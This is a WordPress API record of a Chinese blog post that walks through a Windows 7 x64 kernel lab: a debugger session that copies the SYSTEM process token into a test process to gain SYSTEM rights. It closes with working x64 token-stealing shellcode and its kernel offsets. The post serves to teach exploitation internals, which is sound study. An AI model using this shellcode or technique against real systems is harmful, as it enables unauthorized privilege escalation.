{"id":220,"date":"2019-04-15T23:27:06","date_gmt":"2019-04-15T15:27:06","guid":{"rendered":"http:\/\/www.sinkland.cn\/?p=220"},"modified":"2019-08-23T21:37:14","modified_gmt":"2019-08-23T13:37:14","slug":"token%e6%9b%bf%e6%8d%a2%e6%8f%90%e6%9d%83%e5%ae%9e%e9%aa%8c","status":"publish","type":"post","link":"http:\/\/www.sinkland.cn\/?p=220","title":{"rendered":"Token\u66ff\u6362\u63d0\u6743\u5b9e\u9a8c"},"content":{"rendered":"

Token\u66ff\u6362\u662fwindows\u5185\u6838\u63d0\u6743\u4e2d\u6700\u5e38\u89c1\u7684\u64cd\u4f5c\u3002<\/p>\n

\u8fd9\u91cc\u6765\u8bf4\u660e\u4e00\u4e0b\u4ec0\u4e48\u662fToken\uff0c\u4ee5\u53caToken\u66ff\u6362\u600e\u6837\u8fbe\u5230\u63d0\u6743\u7684\u64cd\u4f5c\u3002<\/p>\n

\u8fd9\u91cc\u6211\u4eec\u5148\u6765\u5199\u4e00\u6bb5\u6d4b\u8bd5\u7a0b\u5e8f\uff0c\u5f88\u7b80\u5355\u521b\u5efa\u4e86\u4e00\u4e2acmd\u8fdb\u7a0b\u3002<\/p>\n

\/\/RunCmd.exe\n\n#include \"windows.h\"\n\nint main()\n{\n    printf(\"Before Run cmd ..\\n\");\n    getchar();\n\n    system(\"cmd\");\n    return 0;\n}\n<\/code><\/pre>\n
\u4e3a\u4ec0\u4e48\u8981\u521b\u5efa\u5b50\u8fdb\u7a0b\u5462\uff0c\u56e0\u4e3a\u6211\u4eec\u66ff\u6362Token\u540e\u5e76\u4e0d\u80fd\u76f4\u63a5\u770b\u5230\u7236\u8fdb\u7a0b\u7684\u6240\u6709\u7528\u6237\u7684\u53d8\u5316\u3002<\/p>\n
\u4f46\u662f\u5b50\u8fdb\u7a0b\u4f1a\u7ee7\u627f\u7236\u8fdb\u7a0b\u7684Token\u76f8\u5173\u5c5e\u6027\uff0c\u6240\u4ee5\u5982\u679c\u521b\u5efa\u7684\u5b50\u8fdb\u7a0b\u662f\u662f\u9ad8\u6743\u9650\u7528\u6237\uff0c\u90a3\u4e48\u5c31\u53ef\u4ee5\u4ee3\u8868\u66ff\u6362\u6210\u529f\u3002<\/p>\n
\u6211\u4eec\u770b\u4e0b\u8fd9\u4e2a\u7a0b\u5e8f\u7684Token<\/p>\n
\/\/ win7x64\nkd> !process 0 0\n...\nPROCESS fffffa8002276060\n    SessionId: 1  Cid: 0274    Peb: 7efdf000  ParentCid: 0838\n    DirBase: 785ad000  ObjectTable: fffff8a00b5d5530  HandleCount:  12.\n    Image: RunCmd.exe\n\nkd> dt _EPROCESS fffffa8002276060 -d Token\nnt!_EPROCESS\n   +0x208 Token : _EX_FAST_REF\n\n<\/code><\/pre>\n
\u53ef\u4ee5\u770b\u5230Token\u7684\u504f\u79fb\u662f0x208\uff0c\u6765\u770b\u4e0bToken\u7684\u503c<\/p>\n
kd> dq fffffa8002276060 + 0x208\nfffffa80`02276268  fffff8a0`07d333e8 00000000`00068031\n<\/code><\/pre>\n
\u6216\u8005<\/p>\n
kd>  dt _EX_FAST_REF 0xfffffa8002276060 + 0x208\nnt!_EX_FAST_REF\n   +0x000 Object           : 0xfffff8a0`07d333e8 Void\n   +0x000 RefCnt           : 0y1000\n   +0x000 Value            : 0xfffff8a0`07d333e8\n<\/code><\/pre>\n
\u53ef\u4ee5\u770b\u5230\uff1avalue\u7684\u503c\u662f 0xfffff8a0`07d333e8<\/strong><\/p>\n
\u9700\u8981\u6ce8\u610f\u7684\u662f:\u8fd9\u4e2a\u6570\u6700\u540e\u56db\u4f4d\u4ee3\u8868\u8fd9\u4e2atoken\u7684\u5f15\u7528\u8ba1\u6570<\/p>\n
\u4e5f\u5c31\u662f\u771f\u6b63\u7684Token\u6307\u9488\u662f: fffff8a0`07d333e0<\/strong><\/p>\n
kd> ? 0xfffff8a0`07d333e8 & ffffffff`fffffff0\nEvaluate expression: -8108766972960 = fffff8a0`07d333e0\n<\/code><\/pre>\n
\n
\u6211\u4eec\u53ef\u4ee5\u770b\u4e0b\u8fd9\u4e2aToken\u7684\u5185\u5bb9:<\/p>\n
kd> dt _TOKEN fffff8a0`07d333e0\nnt!_TOKEN\n   +0x000 TokenSource      : _TOKEN_SOURCE\n   +0x010 TokenId          : _LUID\n   +0x018 AuthenticationId : _LUID\n   +0x020 ParentTokenId    : _LUID\n   +0x028 ExpirationTime   : _LARGE_INTEGER 0x7fffffff`ffffffff\n   +0x030 TokenLock        : 0xfffffa80`03054880 _ERESOURCE\n   +0x038 ModifiedId       : _LUID\n   +0x040 Privileges       : _SEP_TOKEN_PRIVILEGES\n   +0x058 AuditPolicy      : _SEP_AUDIT_POLICY\n   +0x074 SessionId        : 1\n   +0x078 UserAndGroupCount : 0xd\n   +0x07c RestrictedSidCount : 0\n   +0x080 VariableLength   : 0x264\n   +0x084 DynamicCharged   : 0x400\n   +0x088 DynamicAvailable : 0\n   +0x08c DefaultOwnerIndex : 3\n   +0x090 UserAndGroups    : 0xfffff8a0`07d336e8 _SID_AND_ATTRIBUTES\n   +0x098 RestrictedSids   : (null) \n   +0x0a0 PrimaryGroup     : 0xfffff8a0`06ee56c0 Void\n   +0x0a8 DynamicPart      : 0xfffff8a0`06ee56c0  -> 0x501\n   +0x0b0 DefaultDacl      : 0xfffff8a0`06ee56dc _ACL\n   +0x0b8 TokenType        : 1 ( TokenPrimary )\n   +0x0bc ImpersonationLevel : 0 ( SecurityAnonymous )\n   +0x0c0 TokenFlags       : 0x2000\n   +0x0c4 TokenInUse       : 0x1 ''\n   +0x0c8 IntegrityLevelIndex : 0xc\n   +0x0cc MandatoryPolicy  : 3\n   +0x0d0 LogonSession     : 0xfffff8a0`01bf4830 _SEP_LOGON_SESSION_REFERENCES\n   +0x0d8 OriginatingLogonSession : _LUID\n   +0x0e0 SidHash          : _SID_AND_ATTRIBUTES_HASH\n   +0x1f0 RestrictedSidHash : _SID_AND_ATTRIBUTES_HASH\n   +0x300 pSecurityAttributes : 0xfffff8a0`02ee5a70 _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION\n   +0x308 VariablePart     : 0xfffff8a0`07d337b8\n<\/code><\/pre>\n
\u6216\u8005:<\/p>\n
kd> !token fffff8a0`07d333e0\n_TOKEN 0xfffff8a007d333e0\nTS Session ID: 0x1\nUser: S-1-5-21-1071733736-4194771383-3987741639-500\nUser Groups: \n 00 S-1-5-21-1071733736-4194771383-3987741639-513\n    Attributes - Mandatory Default Enabled \n 01 S-1-1-0\n    Attributes - Mandatory Default Enabled \n 02 S-1-5-32-544\n    Attributes - Mandatory Default Enabled Owner \n 03 S-1-5-32-545\n    Attributes - Mandatory Default Enabled \n 04 S-1-5-4\n    Attributes - Mandatory Default Enabled \n 05 S-1-2-1\n    Attributes - Mandatory Default Enabled \n 06 S-1-5-11\n    Attributes - Mandatory Default Enabled \n 07 S-1-5-15\n    Attributes - Mandatory Default Enabled \n 08 S-1-5-5-0-90708\n    Attributes - Mandatory Default Enabled LogonId \n 09 S-1-2-0\n    Attributes - Mandatory Default Enabled \n 10 S-1-5-64-10\n    Attributes - Mandatory Default Enabled \n 11 S-1-16-12288\n    Attributes - GroupIntegrity GroupIntegrityEnabled \nPrimary Group: S-1-5-21-1071733736-4194771383-3987741639-513\nPrivs: \n 05 0x000000005 SeIncreaseQuotaPrivilege          Attributes - \n 08 0x000000008 SeSecurityPrivilege               Attributes - \n 09 0x000000009 SeTakeOwnershipPrivilege          Attributes - \n 10 0x00000000a SeLoadDriverPrivilege             Attributes - \n 11 0x00000000b SeSystemProfilePrivilege          Attributes - \n 12 0x00000000c SeSystemtimePrivilege             Attributes - \n 13 0x00000000d SeProfileSingleProcessPrivilege   Attributes - \n 14 0x00000000e SeIncreaseBasePriorityPrivilege   Attributes - \n 15 0x00000000f SeCreatePagefilePrivilege         Attributes - \n 17 0x000000011 SeBackupPrivilege                 Attributes - \n 18 0x000000012 SeRestorePrivilege                Attributes - \n 19 0x000000013 SeShutdownPrivilege               Attributes - \n 20 0x000000014 SeDebugPrivilege                  Attributes - \n 22 0x000000016 SeSystemEnvironmentPrivilege      Attributes - \n 23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default \n 24 0x000000018 SeRemoteShutdownPrivilege         Attributes - \n 25 0x000000019 SeUndockPrivilege                 Attributes - \n 28 0x00000001c SeManageVolumePrivilege           Attributes - \n 29 0x00000001d SeImpersonatePrivilege            Attributes - Enabled Default \n 30 0x00000001e SeCreateGlobalPrivilege           Attributes - Enabled Default \n 33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes - \n 34 0x000000022 SeTimeZonePrivilege               Attributes - \n 35 0x000000023 SeCreateSymbolicLinkPrivilege     Attributes - \nAuthentication ID:         (0,162aa)\nImpersonation Level:       Anonymous\nTokenType:                 Primary\nSource: User32             TokenFlags: 0x2000 ( Token in use )\nToken ID: b269a9           ParentToken ID: 0\nModified ID:               (0, b26710)\nRestrictedSidCount: 0      RestrictedSids: 0x0000000000000000\nOriginatingLogonSession: 3e7\n<\/code><\/pre>\n
\u66ff\u6362System\u6307\u9488<\/h3>\n
kd> !process 0 0 System\nPROCESS fffffa80018d0090\n    SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000\n    DirBase: 00187000  ObjectTable: fffff8a0000017f0  HandleCount: 487.\n    Image: System\n\nkd> dq fffffa80018d0090 + 208\nfffffa80`018d0298  fffff8a0`00004bb4 00000000`00000000\n<\/code><\/pre>\n
\u53ef\u4ee5\u770b\u5230System\u8fdb\u7a0b\u7684Token\u6307\u9488&\u5f15\u7528\u8ba1\u6570\u662f:fffff8a0`00004bb4<\/strong><\/p>\n
\u5f00\u59cb\u66ff\u6362:<\/p>\n
kd> dq fffffa8002276060 + 208\nfffffa80`02276268  fffff8a0`07d333e8 00000000`00068031\n\nkd> eq fffffa8002276060 + 208 fffff8a0`00004bb4\n\nkd> dq fffffa8002276060 + 208\nfffffa80`02276268  fffff8a0`00004bb4 00000000`00068031\n\n<\/code><\/pre>\n
\u8fd9\u65f6\u5019\uff0c\u5728RunCmd\u754c\u9762\u6309\u4e0benter\u952e\uff0c\u5e76\u8f93\u5165\u547d\u4ee4:<\/p>\n
whoami\n<\/code><\/pre>\n
\u6210\u529f\u63d0\u6743\uff1a<\/p>\n
\"image\"<\/p>\n
\n
\u987a\u4fbf\u9644\u4e0a\u4e00\u6bb5x64\u4e0b\u66ff\u6362token Shellcode:<\/p>\n
.CONST\n    ; Windows 7 SP1 x64 Offsets\n    KTHREAD_OFFSET     equ 188h   ; nt!_KPCR.PcrbData.CurrentThread\n    EPROCESS_OFFSET    equ 70h    ; nt!_KTHREAD.ApcState.Process\n    SYSTEM_PID         equ 04h    ; SYSTEM Process PID\n    FLINK_OFFSET       equ 188h   ; nt!_EPROCESS.ActiveProcessLinks.Flink\n    PID_OFFSET         equ 180h   ; nt!_EPROCESS.UniqueProcessId\n    TOKEN_OFFSET       equ 208h   ; nt!_EPROCESS.Token\n\n.CODE\nShellcodeTokenReplace PROC\n    push rcx\n    push rdx\n\n    xor rax, rax\n    mov rax, gs:[rax + KTHREAD_OFFSET]\n    mov rax, [rax + EPROCESS_OFFSET]\n\n    mov rcx, rax\n    mov rdx, SYSTEM_PID\n\n    SearchSystemPID:\n        mov rax, [rax + FLINK_OFFSET]\n        sub rax, FLINK_OFFSET\n        cmp [rax + PID_OFFSET], rdx\n        jne SearchSystemPID\n\n    mov rax, [rax + TOKEN_OFFSET]\n    mov [rcx + TOKEN_OFFSET], rax\n\n    pop rdx\n    pop rcx\n    ret\nShellcodeTokenReplace ENDP\n\nEND\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
Token\u66ff\u6362\u662fwindows\u5185\u6838\u63d0\u6743\u4e2d\u6700\u5e38\u89c1\u7684\u64cd\u4f5c\u3002 \u8fd9\u91cc\u6765\u8bf4\u660e\u4e00\u4e0b\u4ec0\u4e48\u662fToken\uff0c\u4ee5\u53caToken\u66ff\u6362\u600e\u6837 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"_links":{"self":[{"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=\/wp\/v2\/posts\/220"}],"collection":[{"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=220"}],"version-history":[{"count":1,"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=\/wp\/v2\/posts\/220\/revisions"}],"predecessor-version":[{"id":221,"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=\/wp\/v2\/posts\/220\/revisions\/221"}],"wp:attachment":[{"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=220"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=220"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=220"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}